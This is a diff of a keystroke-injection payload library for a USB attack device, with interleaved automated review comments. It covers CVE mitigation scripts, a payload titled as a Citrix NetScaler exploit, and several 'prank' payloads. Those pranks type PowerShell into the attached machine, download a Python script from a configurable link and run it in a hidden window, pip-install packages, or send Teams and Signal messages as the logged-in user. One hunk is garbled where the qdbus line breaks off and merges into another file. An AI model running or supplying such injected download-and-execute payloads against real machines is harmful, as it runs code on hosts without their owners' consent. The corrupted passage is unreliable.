+ - The registry key FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION is located in the Main folder under the Internet Explorer settings, within the path HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl. This registry key is used to mitigate the vulnerability known as "Office and Windows HTML Remote Code Execution Vulnerability" (CVE-2023-36884).
-REM The CVE-2023-36884 vulnerability allows remote code execution through the processing of HTML files by Office and Windows applications. Creating this registry key and adding specific application values, such as REG_DWORD with data 1, helps block cross-protocol file navigation to mitigate the exploitation of this vulnerability.
+The CVE-2023-36884 vulnerability allows remote code execution through the processing of HTML files by Office and Windows applications. Creating this registry key and adding specific application values, such as REG_DWORD with data 1, helps block cross-protocol file navigation to mitigate the exploitation of this vulnerability.
-REM It is recommended to implement these protective measures to prevent potential attacks that could exploit the vulnerability and compromise the security of Office and Windows systems. It is important to understand the implications of modifying the registry and carefully evaluate the impact on the regular functionality of the involved applications.
+It is recommended to implement these protective measures to prevent potential attacks that could exploit the vulnerability and compromise the security of Office and Windows systems. It is important to understand the implications of modifying the registry and carefully evaluate the impact on the regular functionality of the involved applications.
-REM Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
+Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
+END_REM
+
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI x
DELAY 500
STRING a
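Review bot: The mitigation text in the new REM_BLOCK contradicts itself about where the key lives. It says FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION is "in the Main folder", but the path it then gives, `HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl`, has no `Main` component. Someone applying the mitigation by hand from this comment could create the key where it has no effect. As far as I recall, the MSRC advisory cited as Source places it under `…\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION`, so the comment should match that. Confirm against the advisory and against the path the payload actually writes, which lies outside this hunk.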
diff --git a/payloads/library/incident_response/Defend_yourself_from_CVE-2023-23397/payload.txt b/payloads/library/incident_response/Defend_yourself_from_CVE-2023-23397/payload.txt
index 8e9ae563d..7c6ec5a66 100644
--- a/payloads/library/incident_response/Defend_yourself_from_CVE-2023-23397/payload.txt
+++ b/payloads/library/incident_response/Defend_yourself_from_CVE-2023-23397/payload.txt
@@ -1,25 +1,27 @@
-REM ########################################################
-REM # |
-REM # Title : Defend Yourself From CVE-2023-23397 |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Incident-Response |
-REM # Target : Windows 10/11 |
-REM # |
-REM ########################################################
-
-REM PlugAndPlay <3
-
-REM Requirements:
-REM - ExecutionPolicy Bypass
-REM - PayloadStudio 1.3.1
-
-REM Impacted Products:
-REM - All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected.
-
-REM Mitigation:
-REM - Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares.
-REM Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
+REM_BLOCK
+########################################################
+# #
+# Title : Defend Yourself From CVE-2023-23397 #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Incident-Response #
+# Target : Windows 10/11 #
+# #
+########################################################
+
+PlugAndPlay <3
+
+Requirements:
+ - ExecutionPolicy Bypass
+ - PayloadStudio 1.3.1
+
+Impacted Products:
+ - All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected.
+
+Mitigation:
+ - Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares.
+ Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
+END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt
index 8b2495e02..564217675 100644
--- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt
+++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt
@@ -1,12 +1,14 @@
-REM ################################################################################
-REM # #
-REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : incident-response #
-REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
-REM # #
-REM ################################################################################
+REM_BLOCK
+################################################################################
+# #
+# Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : incident-response #
+# Target : Citrix NetScaler ADV; NetScaler Gateway #
+# #
+################################################################################
+END_REM
REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
DEFINE #HOSTNAME example
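Review bot: The Target line in the rewritten header reads `Citrix NetScaler ADV`, while the title and the `#HOSTNAME` comment below it both say ADC. Since the banner is being re-typed in this hunk, correct it to `Citrix NetScaler ADC; NetScaler Gateway`. The header also files the payload under `incident-response` although its title says "Exploit"; aligning the two would let the library index describe the payload accurately.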
diff --git a/payloads/library/prank/Alien Message From Computer/payload.txt b/payloads/library/prank/Alien Message From Computer/payload.txt
index ec205f09f..5713691ba 100644
--- a/payloads/library/prank/Alien Message From Computer/payload.txt
+++ b/payloads/library/prank/Alien Message From Computer/payload.txt
@@ -1,39 +1,79 @@
+REM_BLOCK
+####################################################
+# #
+# Title : Alien Message From Computer #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10/11 #
+# #
+####################################################
-REM ####################################################
-REM # |
-REM # Title : Alien Message From Computer |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10/11 |
-REM # |
-REM ####################################################
+Plug-And-Play <3
+Requirements:
+ - Internet Connection
+ - ExecutionPolicy Bypass
+ - Python
+END_REM
-REM Plug-And-Play <3
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
-REM Requirements:
-REM - Internet Connection
-REM - ExecutionPolicy Bypass
-REM - Python
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 1500
REM Create the file
-STRING New-Item -Path ".\script.py" -ItemType "file" -Force;
+STRING New-Item -Path ".\script.py" -ItemType "file" -Force;
REM Write the code into the file
-STRING Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();"
-ENTER
+STRINGLN Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();"
DELAY 1000
REM Execute the Python script
-STRING Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
-ENTER
+STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
REM Close the PowerShell
DELAY 1000
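Review bot: The script written by the `STRINGLN Set-Content …` line runs `os.system('pip install pyttsx3')` with no version pin. The host therefore installs whatever release and dependencies the package index serves at run time, and the Requirements block does not mention this side effect. Pin it in the typed string, e.g. `pip install pyttsx3==<PINNED_VERSION>`, and add a line to the header such as `- Installs pyttsx3 from PyPI on the target`. Separately, the `New-Item` line is still a bare `STRING` and only works because its trailing `;` joins it to the next line; `Set-Content` creates the file itself, so that step can be dropped. The payload continues past the end of this hunk.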
diff --git a/payloads/library/prank/Change Wallpaper With Screenshot/payload.txt b/payloads/library/prank/Change Wallpaper With Screenshot/payload.txt
index 704dd3f0e..151a556bc 100644
--- a/payloads/library/prank/Change Wallpaper With Screenshot/payload.txt
+++ b/payloads/library/prank/Change Wallpaper With Screenshot/payload.txt
@@ -1,36 +1,72 @@
-REM ######################################################
-REM # |
-REM # Title : Change Wallpaper With Screenshot |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10-11 |
-REM # |
-REM ######################################################
+REM_BLOCK
+######################################################
+# #
+# Title : Change Wallpaper With Screenshot #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10-11 #
+# #
+######################################################
+Requirements:
+ - Internet Connection
+ - ExecutionPolicy Bypass
+ - Python
+END_REM
-REM Requirements:
-REM - Internet Connection
-REM - ExecutionPolicy Bypass
-REM - Python
+REM REQUIRED - Set your Python script link
+DEFINE #SCRIPT-PY-LINK example.com
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
-REM REQUIRED - Set your Python script link
-DEFINE SCRIPT-PY-LINK example.com
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 1000
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 2000
-
-STRING Invoke-WebRequest -Uri "
-STRING SCRIPT-PY-LINK
-STRING " -OutFile "script.py"
-ENTER
+STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
DELAY 2000
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
diff --git a/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/payload.txt b/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/payload.txt
index 3158172bd..2305c40b2 100644
--- a/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/payload.txt
+++ b/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/payload.txt
@@ -1,39 +1,58 @@
-REM ###########################################
-REM # |
-REM # Title : Change Desktop Wallpaper |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Linux (KDE based) |
-REM # |
-REM ###########################################
-
-REM Requirements:
-REM - Internet Connection
-
-DELAY 1000
-CTRL-ALT t
-DELAY 2000
+REM_BLOCK
+###########################################
+# #
+# Title : Change Desktop Wallpaper #
+# Author : Aleff #
+# Version : 1.1 #
+# Category : Prank #
+# Target : Linux (KDE based) #
+# #
+###########################################
+
+Requirements:
+ - Internet Connection
+END_REM
REM Replace 'example.com/IMAGE_NAME' with your image link
-DEFINE IMAGE_LINK example.com/IMAGE_NAME
-STRING wget
-STRING IMAGE_LINK
-ENTER
+DEFINE #IMAGE_LINK example.com/IMAGE_NAME
REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg
-DEFINE IMAGE_PATH="file://example.jpg"
+DEFINE #IMAGE_PATH="file://example.jpg"
-REM It depends by the Internet Connection
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
+CTRL-ALT t
DELAY 2000
-STRING qdbus org.kde.plasmashell /PlasmaShell org.kde.PlasmaShell.evaluateScript 'var allDesktops = desktops();for (i=0;i 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 2000
STRINGLN (New-Object -ComObject WScript.Shell).SendKeys("{F11}")
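Review bot: `DEFINE #IMAGE_PATH="file://example.jpg"`, earlier in this hunk, joins the name and value with `=`. Every other constant on this page separates them with a space (`DEFINE #IMAGE_LINK example.com/IMAGE_NAME` a few lines above it), so `#IMAGE_PATH` is probably not defined as intended and would be typed literally wherever it is used. Suggest `DEFINE #IMAGE_PATH file://example.jpg`, adding the quotes at the point of use if the command needs them. The text of this hunk is cut off in the middle of the `qdbus` line, so the place where the constant is consumed cannot be checked from here.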
diff --git a/payloads/library/prank/Full-ScreenBannerJoke/payload.txt b/payloads/library/prank/Full-ScreenBannerJoke/payload.txt
index b6bc9030f..e304170b2 100644
--- a/payloads/library/prank/Full-ScreenBannerJoke/payload.txt
+++ b/payloads/library/prank/Full-ScreenBannerJoke/payload.txt
@@ -1,36 +1,73 @@
+REM_BLOCK
+############################################
+# #
+# Title : Full-Screen Banner Joke #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10-11 #
+# #
+############################################
-REM ############################################
-REM # |
-REM # Title : Full-Screen Banner Joke |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10-11 |
-REM # |
-REM ############################################
+Requirements:
+ - Internet Connection
+ - Python installed
+ - ExecutionPolicy Bypass
+END_REM
-REM Requirements:
-REM - Internet Connection
-REM - Python installed
-REM - ExecutionPolicy Bypass
+REM REQUIRED - Set your Python script link
+DEFINE #SCRIPT-PY-LINK example.com
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
-REM REQUIRED - Set your Python script link
-DEFINE SCRIPT-PY-LINK example.com
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 500
-STRING Invoke-WebRequest -Uri "
-STRING SCRIPT-PY-LINK
-STRING " -OutFile "script.py"
-ENTER
+STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
DELAY 500
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
diff --git a/payloads/library/prank/PlayASongThroughSpotify_Windows/payload.txt b/payloads/library/prank/PlayASongThroughSpotify_Windows/payload.txt
index d3c0e85c1..1ea18b09e 100644
--- a/payloads/library/prank/PlayASongThroughSpotify_Windows/payload.txt
+++ b/payloads/library/prank/PlayASongThroughSpotify_Windows/payload.txt
@@ -1,29 +1,69 @@
-REM ##################################################
-REM # |
-REM # Title : Play A Song Through Spotify |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10-11 |
-REM # |
-REM ##################################################
+REM_BLOCK
+##################################################
+# #
+# Title : Play A Song Through Spotify #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10-11 #
+# #
+##################################################
+Requirements:
+ - Internet Connection
+ - Spotify installed and user logged-in
+ - ExecutionPolicy Bypass
+END_REM
-REM Requirements:
-REM - Internet Connection
-REM - Spotify installed and user logged-in
-REM - ExecutionPolicy Bypass
+REM REQUIRED - Set your song name
+DEFINE #SONG-NAME example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
-REM REQUIRED - Set your song name
-DEFINE SONG-NAME example
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 1000
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 2000
STRINGLN Start-Process "spotify://"
@@ -43,8 +83,7 @@ REM Some times popups of advertisements may come out and usually they will click
REM ESCAPE
REM DELAY 500
-STRING SONG-NAME
-ENTER
+STRINGLN #SONG-NAME
DELAY 1000
TAB
DELAY 500
diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt
index 3712631f5..9b5b0edec 100644
--- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt
+++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt
@@ -1,12 +1,14 @@
-REM #####################################################
-REM # #
-REM # Title : Prank In The Middle - Thunderbird #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Prank #
-REM # Target : Windows 10/11 #
-REM # #
-REM #####################################################
+REM_BLOCK
+#####################################################
+# #
+# Title : Prank In The Middle - Thunderbird #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10/11 #
+# #
+#####################################################
+END_REM
EXTENSION DETECT_READY
REM VERSION 1.1
@@ -38,8 +40,7 @@ END_EXTENSION
REM Open Thunderbird and goto settings
GUI r
-STRING thunderbird
-ENTER
+STRINGLN thunderbird
DELAY 1000
REPEAT 4 TAB
ENTER
@@ -70,8 +71,7 @@ DELAY 500
REM Open the powershell and goto the directory
GUI r
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 1500
STRING cd
DELAY 500
diff --git a/payloads/library/prank/SendMessagesInTeams/payload.txt b/payloads/library/prank/SendMessagesInTeams/payload.txt
index 3ff4497e9..0212ff986 100644
--- a/payloads/library/prank/SendMessagesInTeams/payload.txt
+++ b/payloads/library/prank/SendMessagesInTeams/payload.txt
@@ -1,37 +1,82 @@
-REM ###########################################
-REM # |
-REM # Title : Send Messages In Teams |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10-11 |
-REM # |
-REM ###########################################
-
-REM Requirements:
-REM - Microsoft Teams installed and user logged-in
-REM - Internet Connection
-REM - ExecutionPolicy Bypass
-REM - Python
-
-REM 1. Open a powershell
-REM 2. Close if Teams is opens and reopen it
-REM 3. Goto search bar
-REM 4. Search the person by name, email, id or what you want...
-REM 5. Downarrow and enter to open the chat
+REM_BLOCK
+###########################################
+# #
+# Title : Send Messages In Teams #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10-11 #
+# #
+###########################################
+
+Requirements:
+ - Microsoft Teams installed and user logged-in
+ - Internet Connection
+ - ExecutionPolicy Bypass
+ - Python
+
+1. Open a powershell
+2. Close if Teams is opens and reopen it
+3. Goto search bar
+4. Search the person by name, email, id or what you want...
+5. Downarrow and enter to open the chat
+END_REM
REM REQUIRED - Name, email, id or what you want for contact the target
-DEFINE USER-ID example
+DEFINE #USER-ID example
+
REM REQUIRED - Messages
-DEFINE MESSAGE1 example
+DEFINE #MESSAGE1 example
+
REM ...
-REM DEFINE MESSAGEN example..
+REM DEFINE #MESSAGEN example..
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 1000
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 2000
REM #### Powershell ####
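Review bot: The PASSIVE_WINDOWS_DETECT block added in this hunk sets `$_OS`, but nothing after `END_EXTENSION` reads it, so `GUI r` and `STRINGLN powershell` are still typed into whatever host the device is attached to, including one the detection marked as not Windows. The extension's own usage example shows the guard; wrapping the payload body in `IF ($_OS == WINDOWS) THEN` … `END_IF` would keep the keystrokes off hosts the payload was never written for. The same applies to the SendSignalMessages and The_Mouse_Moves_By_Itself hunks, which add the identical extension and also never test `$_OS`. The payload body continues outside this hunk, so the closing `END_IF` would belong at the end of the file.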
@@ -44,8 +89,7 @@ DELAY 10000
REM #### Teams ####
CTRL N
DELAY 2000
-STRING USER-ID
-ENTER
+STRINGLN #USER-ID
DELAY 2000
TAB
DELAY 1000
@@ -53,11 +97,10 @@ TAB
DELAY 1000
REM #### Messages ####
-STRING MESSAGE1
-ENTER
+STRINGLN #MESSAGE1
DELAY 1000
REM ...
-REM STRINGLN MESSAGEN
+REM STRINGLN #MESSAGEN
DELAY 500
ALT F4
diff --git a/payloads/library/prank/SendSignalMessages/payload.txt b/payloads/library/prank/SendSignalMessages/payload.txt
index 71c526368..95bee7225 100644
--- a/payloads/library/prank/SendSignalMessages/payload.txt
+++ b/payloads/library/prank/SendSignalMessages/payload.txt
@@ -1,41 +1,83 @@
-REM #########################################
-REM # |
-REM # Title : Send Signal Messages |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank, Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM #########################################
-
-REM Requirements:
-REM - Internet Connection
-REM - Signal App installed
-REM Payload Plug-And-Play but can be edited as you want the message
+REM_BLOCK
+#########################################
+# #
+# Title : Send Signal Messages #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank, Execution #
+# Target : Windows 10-11 #
+# #
+#########################################
+
+Requirements:
+ - Internet Connection
